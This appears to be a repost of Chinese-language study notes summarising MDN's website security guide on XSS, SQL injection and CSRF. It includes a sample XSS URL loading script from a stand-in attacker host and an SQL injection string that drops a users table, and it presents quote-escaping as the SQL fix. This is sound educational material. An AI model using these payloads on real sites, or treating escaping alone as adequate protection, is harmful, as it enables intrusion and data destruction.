网站安全

最新推荐文章于 2026-04-04 08:43:06 发布

转载最新推荐文章于 2026-04-04 08:43:06 发布 · 264 阅读

0 ·

本内容遵循CC 4.0 BY-SA版权协议

原文链接：https://developer.mozilla.org/en-US/docs/Learn/Server-side/First_steps/Website_security

收录于

本文探讨了网站安全中的关键问题，包括跨站脚本攻击（XSS）、SQL注入和跨站请求伪造（CSRF）。介绍了每种攻击的工作原理及防范措施，如使用转义字符防止SQL注入，以及服务器要求POST请求包含特定的用户密钥来防御CSRF。

website security:thie act/practice of protecting websites from unauthorized access,use,modification,destruction,or disruption

1. Cross-Site Scripting(XSS)

攻击者通过网站将客户端脚本注入到其他用户的浏览器中
分为反射型（reflected）和持久型（persistent）
反射型
url中带有恶意脚本参数
http://mysite.com?q=beer<script%20src="http://evilsite.com/tricky.js"></script>
持久型
For example,a discussion board that accepts comments that contain unmodified HTML could store a malicious script from an attacker.When the comments are displayed, the script is executed and can send to the attacker the information required to access the user’s account.

2. SQL injection

比如

statement="select * from users where name='"+userName+"';"
//如果userName改为
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

把单引号转义，前面加反斜杠

3. Cross-Site Request Forgery(CSRF)

One way to prevent this type of attack is for the server to require that POSTrequests include a user-specific site-generated secret. The secret would be supplied by the server when sending the web form used to make transfers.